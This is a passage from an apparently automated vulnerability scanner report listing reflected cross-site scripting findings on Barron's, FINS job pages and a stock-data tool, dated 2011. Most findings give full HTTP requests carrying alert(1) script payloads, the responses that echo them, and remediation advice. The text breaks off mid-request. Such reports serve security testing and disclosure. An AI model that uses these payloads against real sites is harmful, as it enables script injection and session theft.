Cookie: djcs_route=48b94c78-7a58-4a1e-88ea-6f536fd5118d; _chartbeat2=b0yv5wl9epl887ug; rsi_csl=; rsi_segs=; DJSESSION=BIZO%3Dbiz%3D1053%3B; Barrons_Community=; s_cc=true; s_sq=djglobal%2Cdjbarrons%3D%2526pid%253DBOL_Barron%252527s%252520Take_SB50001424052702304605504576554641342164236%2526pidt%253D1%2526oid%253Dhttp%25253A//online.barrons.com/public/search/results.html%25253FKEYWORDS%25253D%25252522MIRIAM%25252520GOTTFRIED%25252522%252526ARTICLESEARCH%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:36:16 GMT
X-DEBUG-BOX-IDENT: sbkj2kwebappp09
X-DEBUG-MODULE-VERSION: DJCS mod_mon 0.7.0.9.5c-2
X-DEBUG-REQUEST: /public/search/results.html?KEYWORDS=%22MIRIAM%20GOTTFRIED%22&ARTICLESEARCHQUERY_PARSER=bylineOR4fa5e"><ScRiPt>alert(1)</ScRiPt>3426fe2fa5b
X-DEBUG-NAMESPACE: app-barrons
Cache-Control:
FastDynaPage-DoNotCache: true
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Length: 85221


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
<input type="hidden" name="ARTICLESEARCHQUERY_PARSER"
value="bylineOR4fa5e"><ScRiPt>alert(1)</ScRiPt>3426fe2fa5b"/>
...[SNIP]...

1.99. http://online.barrons.com/public/search/results.html [KEYWORDS parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://online.barrons.com
Path:   /public/search/results.html

Issue detail

The value of the KEYWORDS request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 548bc\'%3balert(1)//c810fc9d02f was submitted in the KEYWORDS parameter. This input was echoed as 548bc\\';alert(1)//c810fc9d02f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /public/search/results.html?KEYWORDS=%22MIRIAM%20GOTTFRIED%22548bc\'%3balert(1)//c810fc9d02f&ARTICLESEARCHQUERY_PARSER=bylineOR HTTP/1.1
Host: online.barrons.com
Proxy-Connection: keep-alive
Referer: http://online.barrons.com/article/SB50001424052702304605504576554641342164236.html?mod=BOL_hpp_highlight_top
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=48b94c78-7a58-4a1e-88ea-6f536fd5118d; _chartbeat2=b0yv5wl9epl887ug; rsi_csl=; rsi_segs=; DJSESSION=BIZO%3Dbiz%3D1053%3B; Barrons_Community=; s_cc=true; s_sq=djglobal%2Cdjbarrons%3D%2526pid%253DBOL_Barron%252527s%252520Take_SB50001424052702304605504576554641342164236%2526pidt%253D1%2526oid%253Dhttp%25253A//online.barrons.com/public/search/results.html%25253FKEYWORDS%25253D%25252522MIRIAM%25252520GOTTFRIED%25252522%252526ARTICLESEARCH%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:35:36 GMT
X-DEBUG-BOX-IDENT: sbkj2kwebappp11
X-DEBUG-MODULE-VERSION: DJCS mod_mon 0.7.0.9.5c-2
X-DEBUG-REQUEST: /public/search/results.html?KEYWORDS=%22MIRIAM%20GOTTFRIED%22548bc\'%3balert(1)//c810fc9d02f&ARTICLESEARCHQUERY_PARSER=bylineOR
X-DEBUG-NAMESPACE: app-barrons
Cache-Control:
FastDynaPage-DoNotCache: true
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Length: 91745


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
setMetaData('subsection','Search Results');            
       setMetaData('section','Search');            
       setMetaData('primaryproduct','Barrons Online');            
       setMetaData('searchstatement','"MIRIAM GOTTFRIED"548bc\\';alert(1)//c810fc9d02f');            
       setMetaData('ctype','searchresults');            
       setMetaData('sitedomain','online.barrons.com');            
       setMetaData('pagename','SEARCH RESULTS_9_0491');            
       setMetaData('caccess','fre
...[SNIP]...

1.100. http://orbisadvisors.redinews.com/tools/XM01 [fields parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://orbisadvisors.redinews.com
Path:   /tools/XM01

Issue detail

The value of the fields request parameter is copied into the HTML document as plain text between tags. The payload 510d8<a>fae801ceba6 was submitted in the fields parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tools/XM01?queryid=QJ33020&fields=symbol%20rsrrank510d8<a>fae801ceba6&symbol=IYM HTTP/1.1
Host: orbisadvisors.redinews.com
Proxy-Connection: keep-alive
Referer: http://stockoodles.com/v1/MTSNew.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:32:33 GMT
Server: Apache
Pragma: no-cache
Cache-control: no-cache
Connection: close
Content-Type: text/xml
Expires: Wed, 07 Sep 2011 12:32:33 GMT
Content-Length: 136

<?xml version="1.0"?>
<StockData>
<Stock>
<Symbol>IYM</Symbol>
<Unknown>RSRRANK510D8<A>FAE801CEBA6</Unknown>
</Stock>
</StockData>

1.101. http://sales-jobs.fins.com/JobDetail.aspx [JobId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://sales-jobs.fins.com
Path:   /JobDetail.aspx

Issue detail

The value of the JobId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3290"%3ba31635da494 was submitted in the JobId parameter. This input was echoed as a3290";a31635da494 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /JobDetail.aspx?SourcePage=Jobsearch&JobId=129605a3290"%3ba31635da494&SectorId=&CompanyId=&CompanyName=&Source=&Cities=&StateCodes=&JobName=AT-amp-T-Leadership-Development-Fulltime-Program-GR-Various-Locations HTTP/1.1
Host: sales-jobs.fins.com
Proxy-Connection: keep-alive
Referer: http://sales-jobs.fins.com/Jobs/134401/AT-T-Application-Sales-Executive-3-PCG-MAC?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FINSCOUNTRY=ip=50.23.123.106&domain=softlayer.com&company=SoftLayer_Technologies_Inc.&proxy=&country=US&region=CA&city=SANJOSE&dma=807&pmsa=7400&areacode=408&county=SANTACLARA&fips=06085&latitude=37.3353&longitude=-121.8938&timezone=PST&zip=95101+95103+95106+95108-95113+95115-95136+95138-95139+95141+95148+95150-95161+95164+95170+95172-95173+95190-95194+95196&continent=NA&asnum=36351&throughput=vhigh&bw=5000%0a; ASP.NET_SessionId=zkvv5g55vul24tikcf4mns45; s_vnum=1318008818789%26vn%3D1; FinsSearch=RecentSrch=Sales - Technology - hilliard, oh |&QueryString=link%3dFINS_jobs_relatedjobs%24Miles%3d50%24SearchType%3dadvanced%24Search%3dA%24Source%3dcontent%24S%3d45%24SectorName%3dSales%2b-%2bTechnology%24Location%3dHilliard%252c%2bOH|; _chartbeat2=1l9wm5pnn3plmhv2; __utma=1.1638617188.1315416723.1315416723.1315416723.1; __utmb=1.7.10.1315416723; __utmc=1; __utmz=1.1315416723.1.1.utmcsr=allthingsd.com|utmccn=(referral)|utmcmd=referral|utmcct=/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/; s_cc=true; s_invisit=true; s_sq=djfulton%2Cdjglobal%3D%2526pid%253DFINS_at-t-application-sales-executive-3-pcg-mac_3%2526pidt%253D1%2526oid%253Dhttp%25253A//sales-jobs.fins.com/JobDetail.aspx%25253FSourcePage%25253DJobsearch%252526JobId%25253D129605%252526SectorId%25253D%252526CompanyId%25253D%252526Com%2526ot%253DA

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 12:37:48 GMT
Content-Length: 49825


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
s.prop3 = "FINS_Research and Tools_FINS_at-amp-t-leadership-development-fulltime-program-gr-various-locations_3";
s.prop4 = "FINS_";
s.prop5 = "http://sales-jobs.fins.com/Jobs/129605a3290";a31635da494/AT-amp-T-Leadership-Development-Fulltime-Program-GR-Various-Locations";
s.prop6 = "http\x3a\x2f\x2fsales-jobs.fins.com\x3a80\x2fJobs\x2f129605a3290\x22\x3ba31635da494\x2fAT-amp-T-Leadership-D
...[SNIP]...

1.102. http://sales-jobs.fins.com/JobDetail.aspx [SourcePage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales-jobs.fins.com
Path:   /JobDetail.aspx

Issue detail

The value of the SourcePage request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f34f'-alert(1)-'dfa765092f0 was submitted in the SourcePage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /JobDetail.aspx?SourcePage=Jobsearch8f34f'-alert(1)-'dfa765092f0&JobId=129605&SectorId=&CompanyId=&CompanyName=&Source=&Cities=&StateCodes=&JobName=AT-amp-T-Leadership-Development-Fulltime-Program-GR-Various-Locations HTTP/1.1
Host: sales-jobs.fins.com
Proxy-Connection: keep-alive
Referer: http://sales-jobs.fins.com/Jobs/134401/AT-T-Application-Sales-Executive-3-PCG-MAC?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FINSCOUNTRY=ip=50.23.123.106&domain=softlayer.com&company=SoftLayer_Technologies_Inc.&proxy=&country=US&region=CA&city=SANJOSE&dma=807&pmsa=7400&areacode=408&county=SANTACLARA&fips=06085&latitude=37.3353&longitude=-121.8938&timezone=PST&zip=95101+95103+95106+95108-95113+95115-95136+95138-95139+95141+95148+95150-95161+95164+95170+95172-95173+95190-95194+95196&continent=NA&asnum=36351&throughput=vhigh&bw=5000%0a; ASP.NET_SessionId=zkvv5g55vul24tikcf4mns45; s_vnum=1318008818789%26vn%3D1; FinsSearch=RecentSrch=Sales - Technology - hilliard, oh |&QueryString=link%3dFINS_jobs_relatedjobs%24Miles%3d50%24SearchType%3dadvanced%24Search%3dA%24Source%3dcontent%24S%3d45%24SectorName%3dSales%2b-%2bTechnology%24Location%3dHilliard%252c%2bOH|; _chartbeat2=1l9wm5pnn3plmhv2; __utma=1.1638617188.1315416723.1315416723.1315416723.1; __utmb=1.7.10.1315416723; __utmc=1; __utmz=1.1315416723.1.1.utmcsr=allthingsd.com|utmccn=(referral)|utmcmd=referral|utmcct=/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/; s_cc=true; s_invisit=true; s_sq=djfulton%2Cdjglobal%3D%2526pid%253DFINS_at-t-application-sales-executive-3-pcg-mac_3%2526pidt%253D1%2526oid%253Dhttp%25253A//sales-jobs.fins.com/JobDetail.aspx%25253FSourcePage%25253DJobsearch%252526JobId%25253D129605%252526SectorId%25253D%252526CompanyId%25253D%252526Com%2526ot%253DA

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 12:37:32 GMT
Content-Length: 60992


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/JavaScript">
var OB_permalink = 'http://sales-jobs.fins.com/Jobs/129605/AT-amp-T-Leadership-Development-Fulltime-Program-GR-Various-Locations?SourcePage=Jobsearch8f34f'-alert(1)-'dfa765092f0&JobId=129605&JobName=AT-amp-T-Leadership-Development-Fulltime-Program-GR-Various-Locations';
var OB_Template="fins";
var OB_widgetId = 'SB_1'; //'AR_1';
var OB_langJS ='http://widgets.outbrain.com/
...[SNIP]...

1.103. http://sales-jobs.fins.com/Jobs/131547/SiteManagement-Trainee [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://sales-jobs.fins.com
Path:   /Jobs/131547/SiteManagement-Trainee

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9bb54'%3bfca5fe2f801 was submitted in the REST URL parameter 2. This input was echoed as 9bb54';fca5fe2f801 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Jobs/1315479bb54'%3bfca5fe2f801/SiteManagement-Trainee?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD HTTP/1.1
Host: sales-jobs.fins.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FINSCOUNTRY=ip=50.23.123.106&domain=softlayer.com&company=SoftLayer_Technologies_Inc.&proxy=&country=US&region=CA&city=SANJOSE&dma=807&pmsa=7400&areacode=408&county=SANTACLARA&fips=06085&latitude=37.3353&longitude=-121.8938&timezone=PST&zip=95101+95103+95106+95108-95113+95115-95136+95138-95139+95141+95148+95150-95161+95164+95170+95172-95173+95190-95194+95196&continent=NA&asnum=36351&throughput=vhigh&bw=5000%0a; ASP.NET_SessionId=zkvv5g55vul24tikcf4mns45; __utma=1.1638617188.1315416723.1315416723.1315416723.1; __utmb=1.1.10.1315416723; __utmc=1; __utmz=1.1315416723.1.1.utmcsr=allthingsd.com|utmccn=(referral)|utmcmd=referral|utmcct=/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 12:37:47 GMT
Content-Length: 50924


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/JavaScript">
var OB_permalink = 'http://sales-jobs.fins.com/Jobs/1315479bb54';fca5fe2f801/SiteManagement-Trainee?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD&JobId=1315479bb54';fca5fe2f801&JobName=SiteManagement-Trainee';
var OB_Template="fins";
var OB_widgetId = 'SB_1'; //'
...[SNIP]...

1.104. http://sales-jobs.fins.com/Jobs/131547/SiteManagement-Trainee [cobrand parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales-jobs.fins.com
Path:   /Jobs/131547/SiteManagement-Trainee

Issue detail

The value of the cobrand request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db32d'-alert(1)-'f634657a8f4 was submitted in the cobrand parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Jobs/131547/SiteManagement-Trainee?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATDdb32d'-alert(1)-'f634657a8f4 HTTP/1.1
Host: sales-jobs.fins.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FINSCOUNTRY=ip=50.23.123.106&domain=softlayer.com&company=SoftLayer_Technologies_Inc.&proxy=&country=US&region=CA&city=SANJOSE&dma=807&pmsa=7400&areacode=408&county=SANTACLARA&fips=06085&latitude=37.3353&longitude=-121.8938&timezone=PST&zip=95101+95103+95106+95108-95113+95115-95136+95138-95139+95141+95148+95150-95161+95164+95170+95172-95173+95190-95194+95196&continent=NA&asnum=36351&throughput=vhigh&bw=5000%0a; ASP.NET_SessionId=zkvv5g55vul24tikcf4mns45; __utma=1.1638617188.1315416723.1315416723.1315416723.1; __utmb=1.1.10.1315416723; __utmc=1; __utmz=1.1315416723.1.1.utmcsr=allthingsd.com|utmccn=(referral)|utmcmd=referral|utmcct=/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 12:35:05 GMT
Content-Length: 59331


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/JavaScript">
var OB_permalink = 'http://sales-jobs.fins.com/Jobs/131547/SiteManagement-Trainee?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATDdb32d'-alert(1)-'f634657a8f4&JobId=131547&JobName=SiteManagement-Trainee';
var OB_Template="fins";
var OB_widgetId = 'SB_1'; //'AR_1';
var OB_langJS ='http://widgets.outbrain.com/lang_en.js';
if ( typeof(OB_Script)!='undefine
...[SNIP]...

1.105. http://sales-jobs.fins.com/Jobs/131547/SiteManagement-Trainee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales-jobs.fins.com
Path:   /Jobs/131547/SiteManagement-Trainee

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7d15'-alert(1)-'b16f3950789 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Jobs/131547/SiteManagement-Trainee?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD&f7d15'-alert(1)-'b16f3950789=1 HTTP/1.1
Host: sales-jobs.fins.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FINSCOUNTRY=ip=50.23.123.106&domain=softlayer.com&company=SoftLayer_Technologies_Inc.&proxy=&country=US&region=CA&city=SANJOSE&dma=807&pmsa=7400&areacode=408&county=SANTACLARA&fips=06085&latitude=37.3353&longitude=-121.8938&timezone=PST&zip=95101+95103+95106+95108-95113+95115-95136+95138-95139+95141+95148+95150-95161+95164+95170+95172-95173+95190-95194+95196&continent=NA&asnum=36351&throughput=vhigh&bw=5000%0a; ASP.NET_SessionId=zkvv5g55vul24tikcf4mns45; __utma=1.1638617188.1315416723.1315416723.1315416723.1; __utmb=1.1.10.1315416723; __utmc=1; __utmz=1.1315416723.1.1.utmcsr=allthingsd.com|utmccn=(referral)|utmcmd=referral|utmcct=/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 12:37:00 GMT
Content-Length: 60961


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/JavaScript">
var OB_permalink = 'http://sales-jobs.fins.com/Jobs/131547/SiteManagement-Trainee?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD&f7d15'-alert(1)-'b16f3950789=1&JobId=131547&JobName=SiteManagement-Trainee';
var OB_Template="fins";
var OB_widgetId = 'SB_1'; //'AR_1';
var OB_langJS ='http://widgets.outbrain.com/lang_en.js';
if ( typeof(OB_Script)!='undefi
...[SNIP]...

1.106. http://sales-jobs.fins.com/Jobs/131547/SiteManagement-Trainee [reflink parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales-jobs.fins.com
Path:   /Jobs/131547/SiteManagement-Trainee

Issue detail

The value of the reflink request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f134'-alert(1)-'f9c84c54baf was submitted in the reflink parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Jobs/131547/SiteManagement-Trainee?reflink=djm_modulewsj_widgetjobs_jobsatdmedia3f134'-alert(1)-'f9c84c54baf&cobrand=ATD HTTP/1.1
Host: sales-jobs.fins.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FINSCOUNTRY=ip=50.23.123.106&domain=softlayer.com&company=SoftLayer_Technologies_Inc.&proxy=&country=US&region=CA&city=SANJOSE&dma=807&pmsa=7400&areacode=408&county=SANTACLARA&fips=06085&latitude=37.3353&longitude=-121.8938&timezone=PST&zip=95101+95103+95106+95108-95113+95115-95136+95138-95139+95141+95148+95150-95161+95164+95170+95172-95173+95190-95194+95196&continent=NA&asnum=36351&throughput=vhigh&bw=5000%0a; ASP.NET_SessionId=zkvv5g55vul24tikcf4mns45; __utma=1.1638617188.1315416723.1315416723.1315416723.1; __utmb=1.1.10.1315416723; __utmc=1; __utmz=1.1315416723.1.1.utmcsr=allthingsd.com|utmccn=(referral)|utmcmd=referral|utmcct=/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 12:33:28 GMT
Content-Length: 61092


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/JavaScript">
var OB_permalink = 'http://sales-jobs.fins.com/Jobs/131547/SiteManagement-Trainee?reflink=djm_modulewsj_widgetjobs_jobsatdmedia3f134'-alert(1)-'f9c84c54baf&cobrand=ATD&JobId=131547&JobName=SiteManagement-Trainee';
var OB_Template="fins";
var OB_widgetId = 'SB_1'; //'AR_1';
var OB_langJS ='http://widgets.outbrain.com/lang_en.js';
if ( typeof(OB_Script
...[SNIP]...

1.107. http://sales-jobs.fins.com/Jobs/131750/Acct-Exec-Small-Business-Sales [cobrand parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales-jobs.fins.com
Path:   /Jobs/131750/Acct-Exec-Small-Business-Sales

Issue detail

The value of the cobrand request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d412c'-alert(1)-'1cf6036fd5b was submitted in the cobrand parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Jobs/131750/Acct-Exec-Small-Business-Sales?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATDd412c'-alert(1)-'1cf6036fd5b HTTP/1.1
Host: sales-jobs.fins.com
Proxy-Connection: keep-alive
